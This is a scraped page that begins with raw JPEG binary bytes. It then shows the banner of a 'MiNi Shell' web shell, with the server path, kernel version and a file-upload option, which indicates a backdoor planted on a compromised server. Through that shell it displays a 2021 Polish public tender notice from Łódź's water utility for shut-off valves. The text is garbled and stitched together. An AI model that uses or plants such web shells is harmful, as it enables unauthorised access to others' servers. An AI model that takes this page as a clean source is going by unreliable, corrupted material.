JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210907/0017214001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa armatury odcinającej do łączenia przyłączy domowych z wodociągami i obudów do nich.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&quot;ZAKŁAD WODOCIĄGÓW I KANALIZACJI&quot; SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 472836141</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wierzbowa 52</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">90-133</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">42 6778202</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">42 678 8761</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">umatejas@zwik.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zwik.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający sektorowy - art. 5 ust. 1 pkt 1 - gospodarka wodna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa armatury odcinającej do łączenia przyłączy domowych z wodociągami i obudów do nich.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d427a1ac-0bd1-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00172140</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-09-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zwik-lodz-pzp.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Poczta elektroniczna : umatejas@zwik.lodz.pl – w zakresie określonym w SWZ oraz Platforma Przetargowa ZWiK Sp. z o.o. dostępna pod adresem https://zwik-lodzpzp.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Platforma Przetargowa ZWiK Sp. z o.o. dostępnej pod adresem: https://zwik-lodz-pzp.logintrade.net/rejestracja/ustawowe.html:<br/>•	Dopuszczalne przeglądarki internetowe:<br/>•	Internet Explorer 10 i nowsze, Edge,<br/>•	Google Chrome,<br/>•	Mozilla Firefox,<br/>•	Opera.<br/>•	Pozostałe wymagania techniczne:<br/>•	dostęp do sieci Internet,<br/>•	obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax,<br/>•	włączona obsługa JavaScript,<br/>•	zalecana szybkość łącza internetowego powyżej 500 KB/s,<br/>•	zainstalowany Acrobat Reader,<br/>•	zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">dot. przetwarzania i ochrony danych osobowych zostały opisane w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">dot. przetwarzania i ochrony danych osobowych zostały opisane w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">HHZ.280.2.2021.I</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia są sukcesywne dostawy armatury odcinającej do łączenia przyłączy domowych z wodociągami i obudów do nich.	<br/><br/>Na przedmiot zamówienia składa się:<br/>- 527 szt. fabrycznie nowych nawiertek wodociągowych z obudowami teleskopowymi na rurociągi wykonane z PVC i PEHD do montażu pod <br/>ciśnieniem, nawiercanie boczne, zasuwa zlokalizowana przy wodociągu,<br/>- 226 szt. fabrycznie nowych nawiertek wodociągowych z obudowami <br/>teleskopowymi na rurociągi wykonane z żeliwa i azbestocementu do montażu <br/>pod ciśnieniem, nawiercanie boczne, zasuwa zlokalizowana przy wodociągu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">42131148-5 - Zawory odcinające</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Cena oferty powinna wynikać ze sporządzonej przez Wykonawcę kalkulacji cenowej dokonanej w formularzu ofertowym (załącznik nr 1 SWZ), a następnie wpisana cyfrowo i słownie w pkt. 1 formularza ofertowego.<br/>2.	Cena oferty winna być podana z dokładnością do 2 miejsc po przecinku.<br/>3.	Cena oferty powinna być wyrażona cyfrowo i słownie, w walucie polskiej i obejmować wszystkie koszty związane z realizacją przedmiotu zamówienia, jak również wszystkie inne koszty, które nie zostały wyszczególnione, a są niezbędne do zrealizowania danej części zamówienia, oraz wszelkie podatki obowiązujące na terenie RP w tym podatek VAT, z zastrzeżeniem zapisów pkt 6 niniejszego rozdziału.<br/>4.	Przy dokonywaniu obliczeń stosuje się następujące zasady zaokrągleń:. końcówki poniżej 0,5 grosza pomija się, a końcówki 0,5 grosza i wyższe zaokrągla się do 1 grosza.<br/>5.	Wszelkie rozliczenia związane z realizacją zamówienia, którego dotyczy niniejsza SWZ dokonywane będą w PLN. Nie dopuszcza się rozliczania zamówienia w walutach innych niż polskie złote. <br/>6.	Jeżeli została złożona oferta, której wybór prowadziłby do powstania u zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (Dz. U. z 2018 r. poz. 2174, z późn. zm.15), Wykonawca w ofercie (w formularzy ofertowym – zał. nr 1A i/lub 1B i/lub 1C do SWZ) ma obowiązek:<br/>•	poinformowania zamawiającego, że wybór jego oferty będzie prowadził do powstania u zamawiającego obowiązku podatkowego;<br/>•	wskazania nazwy (rodzaju) towaru lub usługi, których dostawa lub świadczenie będą prowadziły do powstania obowiązku podatkowego;<br/>•	wskazania wartości towaru lub usługi objętego obowiązkiem podatkowym zamawiającego, bez kwoty podatku; <br/>•	wskazania stawki podatku od towarów i usług, która zgodnie z wiedzą wykonawcy, będzie miała zastosowanie.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.Wykonawca, składa aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust.1 ustawy Pzp, (załącznik nr 2 do SWZ). <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, aktualne na dzień składania ofert oświadczenie, o którym mowa w art.125 ust.1 ustawy PZP, (załącznik nr 2 do SWZ) składa każdy z Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1.Wykonawca, składa aktualne na dzień składania ofert oświadczenie, o którym mowa w art. 125 ust.1 ustawy Pzp, (załącznik nr 2 do SWZ). <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, aktualne na dzień składania ofert oświadczenie, o którym mowa w art.125 ust.1 ustawy PZP, (załącznik nr 2 do SWZ) składa każdy z Wykonawców.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1.	Aktualny i ważny atest higieniczny Narodowego Instytutu Zdrowia Publicznego PZH, dopuszczający oferowane nawiertki do kontaktu z wodą przeznaczoną do spożycia przez ludzi.<br/>2.	Deklarację właściwości użytkowych na oferowane nawiertki (m.in. potwierdzającą wykonanie przedmiotu zamówienia zgodnie z normami wymienionymi w rozdziale IV pkt 1). <br/>3.	Karty katalogowe producenta dla zaoferowanych nawiertek i obudów do nich.<br/>4.	Następujące wzory oferowanych nawiertek:<br/>	DN 160/50 na PVC-PEHD wraz z obudową teleskopową - 1 komplet, <br/>	DN 150/50 na żeliwo wraz z obudową teleskopową - 1 komplet. <br/>Uwagi dodatkowe:<br/>1)	Wzory należy dostarczyć do magazynu Zamawiającego, znajdującego się w Łodzi, przy ul. Wierzbowej 52, do terminu składania ofert. <br/>2)	Wzory złożone w miejscu innym niż określone w pkt 1 nie będą podlegały rozpatrzeniu.<br/>3)	Złożone wzory winny odpowiadać opisowi przedmiotu zamówienia zawartemu w SWZ.<br/>4)	Depozyt (wzór) Wykonawcy, którego oferta zostanie wybrana, pozostanie w dyspozycji Zamawiającego przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia. Odbiór złożonych wzorów, przez Wykonawców, których oferty nie zostały wybrane, będzie możliwy po upływie 5 dni kalendarzowych od momentu opublikowania na stronie internetowej (http://www.zwik.lodz.pl) ogłoszenia o wyborze oferty. W celu ustalenia terminu odbioru złożonych depozytów, Wykonawcy winni kontaktować się z pracownikiem Wydziału Zaplecza Technicznego (nr tel.: 42 677-84-11, email: tholownia@zwik.lodz.pl ). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Zamawiający na zasadach określonych w art. 107 ust. 2 PZP, przewiduje możliwość uzupełnienia przedmiotowych środków dowodowych. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest wnieść wadium w wysokości: 5 000,00 PLN. <br/> Wadium wnosi się przed upływem terminu składania ofert. <br/>2.	Wadium może być wniesione według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>a.	pieniądzu;<br/>b.	gwarancjach bankowych;<br/>c.	gwarancjach ubezpieczeniowych;<br/>d.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572 ).<br/>3.	Wadium wnoszone w formie pieniądza należy wpłacić przelewem na rachunek bankowy w Banku BNP PARIBAS nr rachunku PL 15 1600 1143 1847 6912 8000 0005, z dopiskiem na przelewie: „Wadium w postępowaniu pn. „Dostawy armatury odcinającej do łączenia przyłączy domowych z wodociągami i obudów do nich ”.<br/>4.	Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym Zamawiającego, o którym mowa powyżej w pkt. 3 niniejszej SWZ, przed upływem terminu składania ofert (tj. przed upływem dnia i godziny wyznaczonej jako ostateczny termin składania ofert).<br/>5.	W przypadku wnoszenia wadium w innych formach niż w pieniądzu (gwarancje lub poręczenie), wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym złożonym przez osobę lub osoby upoważnione do wystawienia takiego dokumentu.<br/>6.	Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta/Poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 98 ust. 6 PZP.<br/>7.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy zostanie odrzucona.<br/>8.	Okoliczności i zasady zwrotu wadium określa art. 98 ustawy PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, aktualne na dzień składania ofert oświadczenie, o którym mowa w art.125 ust.1 ustawy PZP, (załącznik nr 2 do SWZ) składa każdy z Wykonawców.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia – dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia oraz ewentualnie do zawarcia umowy w sprawie zamówienia szczegółowe zapisy zostały określone w SWZ.<br/>Jeżeli zostanie wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy zobowiązani są dostarczyć Zamawiającemu w terminie przez niego wyznaczonym oryginał umowy regulującej ich współpracę (umowa konsorcjum lub spółki cywilnej) lub jej kopię poświadczoną notarialnie.<br/>Umowa regulująca współpracę Wykonawców składających wspólnie ofertę powinna określać m.in.:<br/>- wyszczególnienie Wykonawców wspólnie ubiegających się o udzielenia zamówienia,<br/>- cel gospodarczy, dla którego została zawarta umowa, <br/> - zasady reprezentacji i zasady prowadzenia spraw, w tym również rozliczeń pomiędzy Wykonawcami działającymi wspólnie oraz wskazanie podmiotu, na rzecz którego kierowane będą wszystkie płatności i korespondencja,<br/>- zapis mówiący, że Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za realizację umowy zawartej ze ZWiK Sp. z o.o., niewykonanie lub nienależyte wykonanie zamówienia,<br/>- oznaczenie czasu trwania umowy (wymaga się, by czas trwania tej umowy nie był krótszy niż okres realizacji zamówienia ),<br/>- zapis mówiący, że żaden z Wykonawców wspólnie składających ofertę bez zgody Zamawiającego nie może dokonać cesji swoich praw i obowiązków wynikających z zawartej umowy na osoby trzecie,<br/>Ww. umowa nie może być umową przedwstępną ani umową zawartą pod warunkiem zawieszającym.<br/>W skład konsorcjum winni wchodzić wszyscy Wykonawcy, którzy wspólnie składali ofertę w postępowaniu. Dodatkowe wymagania w zakresie powyższej umowy Zamawiający może określić w piśmie powiadamiającym o wyborze oferty. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Na podstawie art. 455 ust. 1 pkt. 1 PZP Zamawiający przewiduje możliwość dokonania zmiany w zawartej umowie w następujących sytuacjach: <br/>1.	Wszelkie zmiany treści umowy wymagają formy pisemnej, pod rygorem nieważności, z zastrzeżeniem zmian określonych w § 4 ust. 13 umowy oraz § 8 ust. 2 umowy.<br/>2.	Zakazuje się istotnej w rozumieniu art. 454 ust 2 PZP zmiany umowy. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy, w przypadkach wynikających wprost z przepisów ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych oraz w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych w Umowie.<br/>3.	Zmiany, o których mowa w ust. 2, których Zamawiający będzie mógł dokonywać zgodnie z art. 455 ust. 1 pkt 1) ustawy Prawo zamówień publicznych, mogą obejmować:<br/>3.1.	zmianę regulacji prawnych wprowadzonych w życie po dacie podpisania umowy, wywołującą potrzebę zmiany niniejszej umowy.<br/>3.2.	W przypadku, gdy w okresie obowiązywania umowy nie zostanie wyczerpana kwota przewidywanego wynagrodzenia Wykonawcy, wyszczególniona w § 3 ust. 2 umowy, Zamawiający dopuszcza możliwość przedłużenia okresu obowiązywania niniejszej umowy na warunkach w niej określonych bez zwiększenia wynagrodzenia Wykonawcy. Powyższe wymaga sporządzenia aneksu do niniejszej umowy podpisanego przez strony umowy. W przypadku nie zawarcia aneksu przed upływem terminu obowiązywania umowy umowa ulega rozwiązaniu.<br/>3.3.	Zamawiający dopuszcza zmianę kwoty wynagrodzenia brutto oraz stawki podatku VAT, wyszczególnionych w § 4 ust. 1 umowy, w przypadku ustawowej zmiany stawki VAT na przedmiot niniejszej umowy. Powyższe zmiany wymagają zawarcia aneksu do umowy. <br/>4.	Zmiany, o których mowa powyżej muszą być udokumentowane. Pismo (wniosek) dotyczące ww. zmian wraz z uzasadnieniem, strona występująca z wnioskiem zobowiązana jest złożyć drugiej stronie w terminie 7 (siedmiu) dni od daty powzięcia wiadomości o okoliczności uzasadniającej wprowadzenie zmiany do niniejszej umowy. Samo złożenie wniosku nie oznacza akceptacji drugiej strony na dokonanie zmian umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy Przetargowej ZWiK Sp. z o.o. dostępnej pod adresem https://zwik-lodz-pzp.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-15 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-14</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com